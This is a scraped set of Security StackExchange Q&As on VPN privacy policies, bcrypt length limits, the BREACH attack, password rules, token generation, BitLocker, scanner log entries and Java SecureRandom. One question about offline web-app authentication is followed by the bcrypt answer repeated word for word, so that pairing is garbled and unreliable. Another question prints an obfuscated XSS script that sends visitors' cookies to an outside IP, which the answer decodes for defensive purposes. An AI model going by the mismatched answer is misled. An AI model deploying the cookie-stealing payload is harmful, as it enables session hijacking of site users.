wire-tapping or secret tele-surveillance . To the extent data as referred to in Section 5 is necessary to prevent and expose unauthorised use of an electronic communications network or an electronic communications service. In case the authorities order secret wire-tapping, the service provider shall not disclose information about it Section 19 An operation shall be conducted so a decision on secret
wire-tapping and secret tele-surveillance can be implemented and so
that the implementation is not disclosed . Update 2: Regarding other highly recommended super anonymous VPN services (I'll go over only the top two) BTGuard: You only need to take one look at the Privacy Policy to know that there's something shady going on. Before or at the time of collecting personal information , we will identify the purposes for which information is being collected. We will collect and use of personal information solely with the objective of fulfilling those purposes specified by us and for other
compatible purposes, unless we obtain the consent of the individual
concerned or as required by law . We will only retain personal information as long as necessary for the fulfillment of those purposes . We will collect personal information by lawful and fair means and, where appropriate, with the knowledge or consent of the individual
concerned . You can clearly see the intentionally vague language: "fulfilling those purposes specified by us", what are those purposes specified by them? Nobody knows. They even clearly say that they'll collect personal information when required by the law. In the last point they even state that they even don't have to inform you about the collection of your personal information unless it's "appropriate". PrivateInternetAccess: This is probably one of the easiest legal language in the business. You agree to comply with all applicable laws and regulations in
connection with use of this service. You must also agree that you nor
any other user that you have provided access to will not engage in any
of the following activities: Uploading, possessing, receiving, transporting, or distributing any copyrighted, trademark, or patented content which you do not own or
lack written consent or a license from the copyright owner. Accessing data, systems or networks including attempts to probe scan or test for vulnerabilities of a system or network or to breach
security or authentication measures without written consent from the
owner of the system or network. Accessing the service to violate any laws at the local, state and federal level in the United States of America or the country/territory
in which you reside. If you break any of their conduct conditions (mentioned above) Failure to comply with the present Terms of Service constitutes a
material breach of the Agreement, and may result in one or more of
these following actions: Issuance of a warning; Immediate, temporary, or permanent revocation of access to Privateinternetaccess.com with no refund; Legal actions against you for reimbursement of any costs incurred via indemnity resulting from a breach; Independent legal action by Privateinternetaccess.com as a result of a breach; or Disclosure of such information to law enforcement authorities as deemed reasonably necessary. | {
"source": [
"https://security.stackexchange.com/questions/39788",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/26558/"
]
} |
39,849 | I was messing around with bcrypt today and noticed something: hashpw('testtdsdddddddddddddddddddddddddddddddddddddddddddddddsddddddddddddddddd', salt)
Output: '$2a$15$jQYbLa5m0PIo7eZ6MGCzr.BC17WEAHyTHiwv8oLvyYcg3guP5Zc1y'
hashpw('testtdsdddddddddddddddddddddddddddddddddddddddddddddddsdddddddddddddddddd', salt)
Output: '$2a$15$jQYbLa5m0PIo7eZ6MGCzr.BC17WEAHyTHiwv8oLvyYcg3guP5Zc1y' Does bcrypt have a maximum password length? | Yes, bcrypt has a maximum password length. The original article contains this: the key argument is a secret encryption key, which can be a user-chosen password of up to 56 bytes (including a terminating zero byte when the key is an ASCII string). So one could infer a maximum input password length of 55 characters (not counting the terminating zero). ASCII characters, mind you: a generic Unicode character, when encoded in UTF-8, can use up to four bytes; and the visual concept of a glyph may consist of an unbounded number of Unicode characters. You will save a lot of worries if you restrict your passwords to plain ASCII. However, there is a considerable amount of confusion on the actual limit. Some people believe that the "56 bytes" limit includes a 4-byte salt, leading to a lower limit of 51 characters. Other people point out that the algorithm, internally, manages things as 18 32-bit words, for a total of 72 bytes, so you could go to 71 characters (or even 72 if you don't manage strings with a terminating zero). Actual implementations will have a limit which depends on what the implementer believed and enforced in all of the above. All decent implementations will allow you at least 50 characters. Beyond that, support is not guaranteed. If you need to support passwords longer than 50 characters, you can add a preliminary hashing step, as discussed in this question (but, of course, this means that you no longer compute "the" bcrypt, but a local variant, so interoperability goes down the drain). Edit: it has been pointed out to me that although, from a cryptographer's point of view, the article is the ultimate reference, this is not necessarily how the designers thought about it. The "original" implementation could process up to 72 bytes. Depending on your stance on formalism, you may claim that the implementation is right and the article is wrong. Anyway, such is the current state of things that my advice remains valid: if you keep under 50 characters, you will be fine everywhere. (Of course it would have been better if the algorithm did not have a length limitation in the first place.) | {
"source": [
"https://security.stackexchange.com/questions/39849",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/28936/"
]
} |
39,857 | I'm currently thinking about a web-app that can go offline (after being online) and still be able to provide authentication to the user securely.
(For example, in a multiuser environment, it's quite essential to prevent other users' access.) Right now, I was considering a password-hash authentication with some salt, and just saw this SO question: https://stackoverflow.com/questions/7879641/user-authentication-in-offline-web-apps But since this is a web environment, I have to assume that others have access to the source code of the app, and thus the salt itself is leaked.
(Also, the attacker might use the hash itself to bruteforce the password itself.) So...to summarize, my 2 questions are: Is salting effective even when it's leaked?
I'm guessing no to the question, since it takes O(X^(m+n)) to bruteforce the unknown...
and it gets worse when the attacker uses the password hash to bruteforce the password... Are there any effective (secure) ways to authenticate the user? Any good way to generate a DES key for encrypting the user's data
(and provide a way for the server to distinguish between tampered data and real one?) | Yes, bcrypt has a maximum password length. The original article contains this: the key argument is a secret encryption key, which can be a user-chosen password of up to 56 bytes (including a terminating zero byte when the key is an ASCII string). So one could infer a maximum input password length of 55 characters (not counting the terminating zero). ASCII characters, mind you: a generic Unicode character, when encoded in UTF-8, can use up to four bytes; and the visual concept of a glyph may consist of an unbounded number of Unicode characters. You will save a lot of worries if you restrict your passwords to plain ASCII. However, there is a considerable amount of confusion on the actual limit. Some people believe that the "56 bytes" limit includes a 4-byte salt, leading to a lower limit of 51 characters. Other people point out that the algorithm, internally, manages things as 18 32-bit words, for a total of 72 bytes, so you could go to 71 characters (or even 72 if you don't manage strings with a terminating zero). Actual implementations will have a limit which depends on what the implementer believed and enforced in all of the above. All decent implementations will allow you at least 50 characters. Beyond that, support is not guaranteed. If you need to support passwords longer than 50 characters, you can add a preliminary hashing step, as discussed in this question (but, of course, this means that you no longer compute "the" bcrypt, but a local variant, so interoperability goes down the drain). Edit: it has been pointed out to me that although, from a cryptographer's point of view, the article is the ultimate reference, this is not necessarily how the designers thought about it. The "original" implementation could process up to 72 bytes. Depending on your stance on formalism, you may claim that the implementation is right and the article is wrong. Anyway, such is the current state of things that my advice remains valid: if you keep under 50 characters, you will be fine everywhere. (Of course it would have been better if the algorithm did not have a length limitation in the first place.) | {
"source": [
"https://security.stackexchange.com/questions/39857",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/28979/"
]
} |
39,872 | Recently a provider (of SIP trunking services) I subscribe to sent me a strange email. It claimed that someone in another country attempted to reset the password to my account and was unsuccessful in answering my security question. The provider's response to this event was to reset my password. Dear Customer, We received a request to reset the password for the account ‘myusername’
from the IP address 41.174.96.79 but the security question entered was
invalid. As a security precaution we have set your accounts password to:
roRy1391 Once you have logged in you will be prompted to change your password
immediately. (The email turned out to be real, and I was able to login and change my password successfully.) It seems to me that the appropriate response to such an event is for the provider to do nothing. After all, what if this attacker had already gained access to my email account? Then he would have received this email, and gotten access to my account anyway. However, there is a possibly mitigating factor. This provider always requires answering the security question whenever logging in from a new IP address. This also, in theory, would have stopped this attack if the attacker had gotten access to this password reset email. Was this an appropriate action on the provider's part? If not, what should they have done instead, and what should I say when I yell at them? | This is an absolute breach of security. Even if their policy was somehow sound, sending the password in plaintext to you in an email means that the reset is useless, and as you said, if the attacker had access to your email the security questions wouldn't do squat. They should have done nothing as the security question answered was invalid. The best thing to do, IMHO, is to go a step further and block the user from answering questions for a defined period. Notifying you is a proper step, but changing the password just makes it useless. I'd ask them a simple question: "if you're going to send me (or someone pretending to be me with access to my email) a password if I/someone else guess the security question wrong, what's the point of security questions?" | {
"source": [
"https://security.stackexchange.com/questions/39872",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/11291/"
]
} |
39,925 | Following on from CRIME, now we have BREACH to be presented at Black Hat in Las Vegas Thursday (today). From the linked article, it suggests that this attack against compression will not be as simple to turn off as was done to deter CRIME. What can be done to mitigate this latest assault against HTTP? EDIT: The presenters of BREACH have put up a website with further details. The listed mitigations are: Disabling HTTP compression Separating secrets from user input Randomizing secrets per request Masking secrets Protecting vulnerable pages with CSRF Length hiding Rate-limiting requests (note - also edited title and original question to clarify this attack is against HTTP which may be encrypted, not HTTPS specifically) | Though the article is not full of details, we can infer a few things: Attack uses compression with the same general principle as CRIME : the attacker can make a target system compress a sequence of characters which includes both a secret value (that the attacker tries to guess) and some characters that the attacker can choose. That's a chosen plaintext attack . The compressed length will depend on whether the attacker's string "looks like" the secret or not. The compressed length leaks through SSL encryption, because encryption hides contents , not length . The article specifically speaks of "any secret that's [...] located in the body ". So we are talking about HTTP-level compression, not SSL-level compression. HTTP compression applies on the request body only, not the header. So secrets in the header , in particular cookie values, are safe from that one. Since there are "probe requests", then the attack requires some malicious code in the client browser; the attacker must also observe the encrypted bytes on the network, and coordinate both elements. This is the same setup as for CRIME and BEAST. It is unclear (from the article alone, which is all I have right now to discuss on) whether the compressed body is one from the client or from the server . "Probe request" are certainly sent by the client (on behalf of the attacker) but responses from the server may include part of that which is sent in the request, so the "chosen plaintext attack" can work both ways. In any case, "BREACH" looks like an attack methodology which needs to be adapted to the specific case of a target site. In that sense, it is not new at all; it was already "well-known" that compression leaks information and there was no reason to believe that HTTP-level compression was magically immune. Heck, it was discussed right here last year. It is a good thing, however, that some people go the extra mile to show working demonstrations because otherwise flaws would never be fixed. For instance, padding oracle attacks against CBC had been described and even prototyped in 2002, but it took an actual demo against ASP in 2010 to convince Microsoft that the danger was real. Similarly for BEAST in 2011 (the need for unpredictable IV for CBC mode was known since 2002 as well) and CRIME in 2012; BREACH is more "CRIME II": one more layer of pedagogy to strike down the unbelievers. Unfortunately, a lot of people will get it wrong and believe it to be an attack against SSL, which it is not. It has nothing to do with SSL, really. It is an attack which forces an information leak through a low-bandwidth data channel, the data length , that SSL has never covered, and never claimed to cover. The one-line executive summary is that thou shalt not compress . | {
"source": [
"https://security.stackexchange.com/questions/39925",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/26109/"
]
} |
40,050 | Is it better to create a separate SSH key for each host and user or just using the id_rsa key for all hosts to authenticate? Could one id_rsa be malpractice for the privacy/anonymity policies? having one ssh-key for all hosts: ~/.ssh/id_rsa
~/.ssh/id_rsa.pub in comparison to separate ssh-keys: ~/.ssh/user1_host1
~/.ssh/user1_host1.pub
~/.ssh/user2_host1
~/.ssh/user2_host1.pub
~/.ssh/user3_host2
~/.ssh/user3_host2.pub
~/.ssh/user4_host3
~/.ssh/user4_host3.pub
... etc. | A private key corresponds to a single "identity" for a given user, whatever that means to you. If, to you, an "identity" is a single person, or a single person on a single machine, or perhaps a single instance of an application running on a single machine. The level of granularity is up to you. As far as security is concerned, you don't compromise your key in any way [1] by using it to log in on a machine (as you would by using a password), so having separate keys for separate destinations doesn't make you any more safe from an authentication/security perspective. Though having the same key authorized for multiple machines does prove that the same key-holder has access to both machines from a forensic perspective. Typically that's not an issue, but it's worth pointing out. Also, the more places a single key is authorized, the more valuable that key becomes. If that key gets compromised, more targets are put at risk. Also, the more places the private key is stored (say, your work computer, your laptop, and your backup storage, for example), the more places there are for an attacker to go to grab a copy. So that's worth considering as well. As for universally-applicable guidelines on how to run your security: there are none. The more additional security you add, the more convenience you give up. The one piece of advice I can give categorically is this: keep your private key encrypted. The added security there is pretty significant. [1] : There's one important way in which authorizing the same SSH key in different security contexts could be a problem, and that issue has to do with agent forwarding . The constraints and caveats around safely using agent forwarding is outside the scope of this question though. | {
"source": [
"https://security.stackexchange.com/questions/40050",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/21808/"
]
} |
40,077 | Is it worth to obfuscate a java web app source code so that the web host cannot make wrong use of the code or even steal your business? If so, how should this be dealt with? How should we obfuscate? We are a new start up launching a product in market. How can we protect our product/web application's source code? | A malicious hosting provider can do a lot more than simply steal your code. They can modify it to introduce backdoors, they can steal your clients' data, and ruin your whole business. Trust must exist between you and the host. About the source code. If the attacker is trying to gain access to your source code, they will gain access to your source code, obfuscated or not, compiled or interpreted. There is a value in obfuscating your code, in that you'll probably make it just a liiiiitle bit more difficult to be obtained by the occasional opportunistic attacker. But if your host is out to get you, they'll get you. The solution? The law. Sign a contract with them and agree on some form of NDA . | {
"source": [
"https://security.stackexchange.com/questions/40077",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/10305/"
]
} |
40,208 | I'm looking for recommended options for cryptsetup to create a fully encrypted SSD ( SanDisk SSD U100 128GB ), which achieves: Timing O_DIRECT disk reads: 1476 MB in 3.00 seconds = 491.81 MB/sec
Timing buffered disk reads: 1420 MB in 3.00 seconds = 473.01 MB/sec My benchmark shows me the best cipher: # cryptsetup benchmark
# Tests are approximate using memory only (no storage IO).
PBKDF2-sha1 103696 iterations per second
PBKDF2-sha256 59904 iterations per second
PBKDF2-sha512 38235 iterations per second
PBKDF2-ripemd160 85111 iterations per second
PBKDF2-whirlpool 47216 iterations per second
# Algorithm | Key | Encryption | Decryption
aes-cbc 128b 133.2 MiB/s 432.0 MiB/s
serpent-cbc 128b 18.1 MiB/s 67.3 MiB/s
twofish-cbc 128b 39.3 MiB/s 73.0 MiB/s
aes-cbc 256b 99.6 MiB/s 337.7 MiB/s
serpent-cbc 256b 18.1 MiB/s 66.9 MiB/s
twofish-cbc 256b 39.4 MiB/s 72.6 MiB/s
aes-xts 256b 376.6 MiB/s 375.0 MiB/s
serpent-xts 256b 69.0 MiB/s 66.5 MiB/s
twofish-xts 256b 71.1 MiB/s 72.2 MiB/s
aes-xts 512b 297.0 MiB/s 300.1 MiB/s
serpent-xts 512b 69.6 MiB/s 66.6 MiB/s
twofish-xts 512b 71.9 MiB/s 72.7 MiB/s But perhaps, you could suggest some options, that would increase my performance and security. My CPU is: Intel(R) Core(TM) i7-2677M CPU @ 1.80GHz and it supports AES-NI ( aes cpu flag). Thank you | You might want to use PBKDF2 with SHA-512. This step is for converting your password into an encryption key (more or less directly). This is inherently open to offline dictionary attacks , and relates to the password hashing problematic. For that, you want to maximize the effort of the attacker by choosing an algorithm and iteration count which will make the task hardest for the attacker while keeping it tolerable for you; "tolerable" here depends on your patience, when you type the password at boot time. Attackers will want to use some GPU and/or FPGA to speed up their attack, while you use a normal PC. Nowadays, normal PC are at ease with 64-bit arithmetic operations, and run SHA-512 about as fast as SHA-256; however, GPU much prefer 32-bit operations, and mapping them on FPGA is also easier than 64-bit operations. Therefore, by using SHA-512 instead of SHA-256, you give less an advantage to the attacker. Hence my recommendation: on modern hardware, for password hashing, prefer SHA-512 over SHA-256. Remember to adjust the "iteration count" so that the time taken to process your password is at the threshold of the bearable: higher iteration counts mean longer processing time, but are proportionally better for security. For actual encryption, you will want XTS , which has been designed to support disk encryption efficiently. This indeed shows in the benchmarks; this is for a SSD and you do not want the encryption to be much slower than the underlying hardware. Note that XTS splits the key into two halves, only one of which being used for the actual encryption. In other words, " aes-xts " with a 256-bit key actually uses 128 bits for the AES part. And that's good enough . There is no rational need for going to 256-bit keys -- i.e. 512-bit in the context of " aes-xts ". 256-bit keys for AES imply some CPU overhead, which the benchmarks duly observe (300 MB/s vs 375 MB/s). With a SSD under the hood, you really want a fast encryption system, so do that. | {
"source": [
"https://security.stackexchange.com/questions/40208",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/29209/"
]
} |
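Putting the answer's recommendations together, a plausible cryptsetup invocation would look like the sketch below. The device path and the --iter-time value are placeholders; tune the iteration time to how long you are willing to wait at boot.

# Sketch only: aes-xts with a 256-bit key (i.e. 128-bit AES strength), SHA-512 for the
# PBKDF2 step, and a deliberately high iteration time in milliseconds.
cryptsetup luksFormat --cipher aes-xts-plain64 --key-size 256 --hash sha512 --iter-time 5000 /dev/sdX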
40,227 | Today I was checking comments on my blog and I found a strange comment, here is the exact text <script>var _0x352a=["\x31\x31\x34\x2E\x34\x35\x2E\x32\x31\x37\x2E\x33\x33\x2F\x76\x6C\x6B\x2E\x70\x68\x70","\x63\x6F\x6F\x6B\x69\x65","\x68\x74\x6D\x6C","\x70\x6F\x73\x74"];$[_0x352a[3]](_0x352a[0],{cookie:document[_0x352a[1]]},function (){} ,_0x352a[2]);</script> What does it mean? Is it a mistake? Note that I had big XSS issue last summer but a security expert fixed it. Today I contacted him and he said it's okay and that I should not worry. But I am worried. | First of all, your security guy is likely right. It doesn't look like you have anything to worry about because from your description of the issue and the guy's response I think that the script tags were properly encoded. Think of it as a neutralized weapon. It's there, yes, but it cannot do any damage. Running that code through a deobfuscator gives us $["post"]("114.45.217.33/vlk.php",{cookie:document["cookie"]},function(){},"html") Now we just "beatify" the code to make it more readable $["post"]("114.45.217.33/vlk.php", {
cookie: document["cookie"]
}, function () {}, "html") As you can see, the attacker was hoping that your site is vulnerable to XSS to exploit it and steal your visitor's cookies including yours. He's also assuming/hoping that you're using jQuery, and it's actually a very reasonable assumption these days. If they manage to steal your cookies, then they'll get the session identifier and potentially log in as one of your users or even your administrator account. I'm not sure why he left the callback function there or the response type, though. Removing them would have made the payload even smaller. Running that IP address through a blacklist checking tool shows us that the host there is likely to be compromised. This sure looks like a random attack by a bot trying to insert that code into random blogs and sites in the hopes that one of them would be vulnerable. | {
"source": [
"https://security.stackexchange.com/questions/40227",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/26985/"
]
} |
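For the curious: the _0x352a string table in that comment is just hex-escaped ASCII, and the \xNN escapes mean the same thing in Python as in JavaScript, so a couple of lines reproduce what the deobfuscator showed (illustrative, not part of the original answer).

# Paste the string table into a Python list and the escapes decode themselves.
table = [
    "\x31\x31\x34\x2E\x34\x35\x2E\x32\x31\x37\x2E\x33\x33\x2F\x76\x6C\x6B\x2E\x70\x68\x70",
    "\x63\x6F\x6F\x6B\x69\x65",
    "\x68\x74\x6D\x6C",
    "\x70\x6F\x73\x74",
]
print(table)
# ['114.45.217.33/vlk.php', 'cookie', 'html', 'post']
# i.e. $.post("114.45.217.33/vlk.php", {cookie: document.cookie}, ..., "html")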
40,291 | I have a Linode VPS running Nginx, which currently serves only static content. Once I was looking at the log and noticed some strange requests: XXX.193.171.202 - - [07/Aug/2013:14:04:36 +0400] "GET /user/soapCaller.bs HTTP/1.1" 404 142 "-" "Morfeus Fucking Scanner"
XXX.125.148.79 - - [07/Aug/2013:20:53:35 +0400] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 142 "-" "ZmEu"
XXX.125.148.79 - - [07/Aug/2013:20:53:35 +0400] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 142 "-" "ZmEu"
XXX.125.148.79 - - [07/Aug/2013:20:53:35 +0400] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 142 "-" "ZmEu"
XXX.125.148.79 - - [07/Aug/2013:20:53:35 +0400] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 142 "-" "ZmEu"
XXX.125.148.79 - - [07/Aug/2013:20:53:35 +0400] "GET /pma/scripts/setup.php HTTP/1.1" 404 142 "-" "ZmEu"
XXX.125.148.79 - - [07/Aug/2013:20:53:35 +0400] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 142 "-" "ZmEu"
XXX.221.207.157 - - [07/Aug/2013:22:04:20 +0400] "\x80w\x01\x03\x01\x00N\x00\x00\x00 \x00\x009\x00\x008\x00\x005\x00\x00\x16\x00\x00\x13\x00\x00" 400 172 "-" "-"
XXX.221.207.157 - admin [07/Aug/2013:22:04:21 +0400] "GET /HNAP1/ HTTP/1.1" 404 142 "http://212.71.249.8/" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/xxx.x (KHTML like Gecko) Safari/12x.x" Should I worry about somebody trying to hack my server in this case? | It appears that your server is the target of an automated attack involving the ZmEu scanner . That first request appears to be from another automated attack involving the Morfeus Scanner . That last request appears to be an attempt to exploit vulnerabilities in the Home Network Administration Protocol (HNAP) implementations of D-Link routers. More information about the attack can be found here . From a cursory glance at the requests it's making, I'd say you have nothing to worry about if you aren't running phpmyadmin on your systems. Such attacks are commonplace for servers connected to the internet and the scans are getting 404s indicating that your server does not have what they are looking for. | {
"source": [
"https://security.stackexchange.com/questions/40291",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/19689/"
]
} |
40,310 | I'm generating a token to be used when clicking on the link in a verification e-mail. I plan on using uniqid() but the output will be predictable allowing an attacker to bypass the confirmation e-mails. My solution is to hash it. But that's still not enough because if the hash I'm using is discovered then it will still be predictable. The solution is to salt it. That I'm not sure how to do because if I use a function to give variable salt (e.g. in pseudocode hash(uniqid()+time()) ) then isn't the uniqueness of the hash no longer guaranteed? Should I use a constant hash and that would be good enough (e.g. hash(uniqid()+asd741) ) I think all answers miss an important point. It needs to be unique. What if openssl_random_pseudo_bytes() procduces the same number twice? Then one user wouldn't be able to activate his account. Is people's counter argument that it's unlikely for it to produce the same number twice? That's why I was considering uniqid() because it's output is unique. I guess I could use both and append them together. | You want unguessable randomness. Then, use unguessable randomness. Use openssl_random_pseudo_bytes() which will plug into the local cryptographically strong PRNG . Don't use rand() or mt_rand() , since these are predictable ( mt_rand() is statistically good but it does not hold against sentient attackers). Don't compromise, use a good PRNG. Don't try to make something yourself by throwing in hash function and the like; only sorrow lies at the end of this path. Generate 16 bytes, then encode them into a string if you need a string. bin2hex() encodes in hexadecimal; 16 bytes become 32 characters. base64_encode() encodes in Base64; 16 bytes become 24 characters (the last two of which being '=' signs). 16 bytes is 128 bits, that's the "safe value" making collisions so utterly improbable that you don't need to worry about them. Don't go below that unless you have a good reason (and, even then, don't go below 16 anyway). | {
"source": [
"https://security.stackexchange.com/questions/40310",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/10714/"
]
} |
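The answer above names the PHP primitives; the size arithmetic is easy to check with a short Python equivalent (shown purely for illustration, the PHP functions map one-to-one).

import base64
import os

token = os.urandom(16)                        # 16 bytes = 128 bits from the OS CSPRNG
hex_form = token.hex()                        # 32 characters
b64_form = base64.b64encode(token).decode()   # 24 characters, the last two are '='
print(len(hex_form), hex_form)
print(len(b64_form), b64_form)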
40,441 | Naturally I feel that I have to ask this question, since it's a built-in feature in Windows. Let's say someone has physical access to my PC, is there an easy way for them to access a BitLocker protected drive without physically tampering with the PC (such as hardware keyloggers)? | There is currently only one cold boot attack I know of that works against bitlocker. However it would need to be executed seconds after the computer has been turned off (it can be extended to minutes if the DRAM modules are cooled down significantly) but due to the timeframe of execution it's rather implausible. Bitlocker is secure as long as your machine is completely turned off when you store it (hibernate is also ok, but sleep needs to be disabled). | {
"source": [
"https://security.stackexchange.com/questions/40441",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/29407/"
]
} |
40,512 | After a user registers an e-mail is sent to them with a link they must click on to activate the account. I know other sites have a limit on the amount of time the user has to click the link, else the link expires. Come to think of it why is this necessary? Is it to prevent an attacker from creating accounts to which he does not own the registered e-mail because he could generate an arbitrarily large amount of accounts and have unlimited time to guess activation links to them? If it is necessary, how long should the user have to click on the link? | Most websites allow an e-mail address to be used only for one account which makes sense because most of the time, users only need one account. Therefore, a unique e-mail address is required. That being said, once the user has registered but only needs to confirm his e-mail address, you want to insert in the database the e-mail address of the user to not allow someone else or the very same person to register again. If you do not handle e-mail confirmation expiration, someone could register with someone else's e-mail address and never confirm it which would lock the e-mail of the legitimate user if he ever wants to register to your website. If the user hasn't confirmed his e-mail address in the given length of time, you want to make it available again, in case it wasn't really his address or if he wants to register again later on. Consider the case where a user entered the wrong e-mail address by a mistake. Now for the right length of time, I'd say that it depends on the type of website it is. I don't see the point of allowing more than a few hours because the user should be able to quickly access his e-mail address if he was able to register to your website. Consider the case where a user forgot his e-mail address password and can't access it. He might need to go through some steps to get his password back which could take a while. However, would it really do harm if he has to register again? Once again, it depends on the website. | {
"source": [
"https://security.stackexchange.com/questions/40512",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/10714/"
]
} |
40,564 | /////////////////////////////// Updated Post Below //////////////////////////// This question has received a lot of hits, more than I ever thought it would have on such a basic topic. So, I thought I would update people on what I am doing. Also I keep reading in the comments that I am storing passwords as plain text. Just to clarify I am not. My updated validation function : public function is_password($str) {
if (strlen($str) < 10) { // Less than 10
$this -> set_message('is_password', 'Password must include at least one number, one letter, one capital letter , one symbol and be between 10 and 100 characters long.');
return FALSE;
} elseif (strlen($str) > 100) { // Greater than 100
$this -> set_message('is_password', 'Password must include at least one number, one letter, one capital letter , one symbol and be between 10 and 100 characters long.');
return FALSE;
} elseif (!preg_match("#[0-9]+#", $str)) { // At least 1 number
$this -> set_message('is_password', 'Password must include at least one number, one letter, one capital letter , one symbol and be between 10 and 100 characters long.');
return FALSE;
} elseif (!preg_match("#[a-z]+#", $str)) { // At least 1 letter
$this -> set_message('is_password', 'Password must include at least one number, one letter, one capital letter , one symbol and be between 10 and 100 characters long.');
return FALSE;
} elseif (!preg_match("#[A-Z]+#", $str)) { // At least 1 capital
$this -> set_message('is_password', 'Password must include at least one number, one letter, one capital letter , one symbol and be between 10 and 100 characters long.');
return FALSE;
} elseif (!preg_match("#\W+#", $str)) { // At least 1 symbol
$this -> set_message('is_password', 'Password must include at least one number, one letter, one capital letter , one symbol and be between 10 and 100 characters long.');
return FALSE;
} else {
return TRUE; // No errors
}
} Each time it returns FALSE , I always tell them the entire password need. Just to answer some of the questions as to why it is so long : Why not so long? People at my job that I talk to use sentences. Very long ones at that. How am I hashing my passwords? / Why use 100 characters? -> just use better hashing algorithm For PHP, I am using the best there is for this language. I am using this library which is the PHP 5.5 equivalence of the new password hashing API created by Anthony Ferrara. My reasoning for this hashing use is simple, very high demand on the CPU (if you ever test it out on a Linux/Windows box CPU usage is at 100%). Also, the algorithm is very scalable due to the cost factor the higher the cost the more grueling the task is for the CPU to log a person in. Last I "Tested" , I put the cost to 24. An entire hour passed for me to try and login and I got a PHP time out error before I even got past the login screen (this was a foolish cost factor). A study done by Jeremi Gosney (THIS IS THE PDF DOWNLOAD OF THE REPORT) which tested the strength of this function compared to other more popular ones (yes, more popular) concluded that even with 25 - GPUs, while using bcrypt at a cost of 5, password hashing is the last of your concerns. I use a cost of 17... My function if any one is interested (The parts that pertain to this subject at least) : public function create_user($value) {
$this -> CI = get_instance();
$this -> CI -> load -> library('bcrypt');
foreach ($value as $k => $v) { // add PDO placeholders to the keys
$vals[":$k"] = $v;
}
$vals[":password"] = $this -> CI -> bcrypt -> password_hash($vals[":password"], PASSWORD_BCRYPT, array("cost" => 17)); // Take old $vals[":password"] and run it through bcrypt to come up with the new $vals[":password"] Hopefully this question helps others out there. /////////////////////////////// Original Post Below //////////////////////////// I'm currently working on a new project, and an issue struck me. Is it it safe to disclose your password requirements? If so, why is it safe? I have a function that does validation on a password and each step shows the user why validation does not work. Here is my function: public function is_password($str) {
if (strlen($str) < 10) {
$this -> set_message('is_password', 'Password too short.');
return FALSE;
} elseif (strlen($str) > 100) {
$this -> set_message('is_password', 'Password is too long.');
return FALSE;
} elseif (!preg_match("#[0-9]+#", $str)) {
$this -> set_message('is_password', 'Password must include at least one number.');
return FALSE;
} elseif (!preg_match("#[a-z]+#", $str)) {
$this -> set_message('is_password', 'Password must contain at least one letter.');
return FALSE;
} elseif (!preg_match("#[A-Z]+#", $str)) {
$this -> set_message('is_password', 'Password must contain at least one capital letter.');
return FALSE;
} elseif (!preg_match("#\W+#", $pwd)) {
$this -> set_message('is_password', 'Password must include at least one symbol.');
return FALSE;
} else {
return TRUE;
}
} My thought on this is, if we let the "user" / attacker know what my passwords consist of wouldn't it be easier for the attacker to know? I know security through obscurity is not a best practice, but could it be a strong argument in this situation? I would like to know if I am going about this in the right way. Any help would be great. | If you do not divulge your "password requirements" then your users will hate you. Some will not succeed in finding an "acceptable password" and will call the helpdesk. Or, worse, if the users are customers then they will go buy elsewhere. A great way to kill your own business ! On the other hand, if divulging your "password requirements" really help attackers in a non-negligible way, then your password requirements are awfully bad: not only do they antagonize users, but they also restrain the users into a too small set of possible passwords. Note that attackers can usually guess quite well what your "password requirements" are, e.g. by trying to register themselves. In any case, "password requirements" are counter-productive and decrease security, save for a "minimum length" which can be rationally justified. So just don't do that. Key to password security is user education , possibly helped with some tools (e.g. a random generator for strong passwords). Enforcing constraints does not help; and enforcing hidden constraints is just worse. For instance, if your rules call for at least one digit and one symbol, then a surprisingly high proportion of users will just append "1." at the end of their password; attackers know that. The extra suffix will not add much to the password entropy (i.e. the number of potential passwords the attacker has to try for a successful break) but will use up some of the scarce resource known as "user patience": users will prefer shorter passwords, since they have to add the "1." suffix to appease your server. | {
"source": [
"https://security.stackexchange.com/questions/40564",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/29474/"
]
} |
40,633 | I know from experience that reading from /dev/random blocks when the Linux kernel entropy pool runs out of entropy. Also, I've seen many articles and blog entries stating that when running on Linux, java.security.SecureRandom uses /dev/random as its entropy source and thus blocks when the kernel entropy pool runs out of entropy. However, I'm unable to produce an experiment which causes SecureRandom to block. Conversely, it seems easy to get a simple bash one-liner which reads from /dev/random to block. Here's the java code I'm using for these experiments: import java.security.SecureRandom;
public class A {
public static void main(String[] args) {
SecureRandom sr = new SecureRandom();
int out = 0;
for (int i = 0; i < 1<<20 ; i++) {
out ^= sr.nextInt();
}
System.out.println(out);
}
} It generates just over 1,000,000 random 32-bit integers. That should be 2^(20 + log2(32)) = 2^25 bits or 2^22 (a little over 4 million) bytes of entropy, right? However, it never blocks. It always finishes in about 1.2 seconds no matter whether I wiggle the mouse or not. The bash one-liner I used is: head -c 100 /dev/random | xxd This blocks easily. As long as I keep my hand off of the mouse and keyboard, it'll sit there doing nothing for several minutes. And I'm only asking for 100 bytes of entropy. Surely I'm missing something here. Could someone explain what's going on? Thanks! | Both OpenJDK and Sun read from /dev/urandom , not /dev/random , at least on the machine where I tested (OpenJDK JRE 6b27 and Sun JRE 6.26 on Debian squeeze amd64). For some reason, they both open /dev/random as well but never read from it. So the blog articles you read either were mistaken or applied to a different version from mine (and, apparently, yours). You can check whether yours reads from /dev/random or /dev/urandom by tracing it: strace -o a.strace -f -e file java A and look for the relevant part of the trace: 21165 open("/dev/random", O_RDONLY) = 6
…
21165 open("/dev/urandom", O_RDONLY) = 7
…
